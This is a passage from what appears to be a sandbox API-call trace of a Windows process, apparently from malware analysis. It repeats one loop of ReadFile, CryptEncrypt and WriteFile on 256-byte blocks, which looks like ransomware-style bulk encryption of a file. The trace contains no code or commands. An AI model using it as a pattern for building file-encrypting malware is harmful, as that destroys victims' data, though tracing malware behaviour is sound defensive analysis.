lpOverlapped=0x0) returned 1 [0164.045] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.045] GetLastError () returned 0x0 [0164.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.045] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.045] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.045] GetLastError () returned 0x0 [0164.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.045] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.045] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.045] GetLastError () returned 0x0 [0164.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.045] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.045] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.045] GetLastError () returned 0x0 [0164.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.045] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.045] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.045] GetLastError () returned 0x0 [0164.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.045] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.046] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.046] GetLastError () returned 0x0 [0164.046] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.046] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.046] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.046] GetLastError () returned 0x0 [0164.046] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.046] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.046] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.046] GetLastError () returned 0x0 [0164.046] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.046] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.046] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.046] GetLastError () returned 0x0 [0164.046] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.046] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.046] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.046] GetLastError () returned 0x0 [0164.046] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.046] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.046] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.046] GetLastError () returned 0x0 [0164.046] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.046] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.046] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.046] GetLastError () returned 0x0 [0164.047] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.047] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.047] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.047] GetLastError () returned 0x0 [0164.047] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.047] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.047] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.047] GetLastError () returned 0x0 [0164.047] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.047] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.047] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.047] GetLastError () returned 0x0 [0164.047] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.047] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.047] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.047] GetLastError () returned 0x0 [0164.047] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.047] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.047] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.047] GetLastError () returned 0x0 [0164.047] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.047] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.047] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.047] GetLastError () returned 0x0 [0164.047] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.048] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.048] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.048] GetLastError () returned 0x0 [0164.048] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.048] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.048] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.048] GetLastError () returned 0x0 [0164.048] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.048] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.048] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.048] GetLastError () returned 0x0 [0164.048] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.048] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.048] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.048] GetLastError () returned 0x0 [0164.048] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.048] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.048] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.048] GetLastError () returned 0x0 [0164.048] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.048] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.048] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.048] GetLastError () returned 0x0 [0164.048] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.048] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.048] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.049] GetLastError () returned 0x0 [0164.049] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.049] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.049] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.049] GetLastError () returned 0x0 [0164.049] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.049] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.049] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.049] GetLastError () returned 0x0 [0164.049] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.049] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.049] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.049] GetLastError () returned 0x0 [0164.049] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.049] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.049] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.049] GetLastError () returned 0x0 [0164.049] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.049] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.049] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.049] GetLastError () returned 0x0 [0164.050] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.051] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.051] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.051] GetLastError () returned 0x0 [0164.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.051] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.051] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.051] GetLastError () returned 0x0 [0164.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.051] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.051] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.051] GetLastError () returned 0x0 [0164.051] 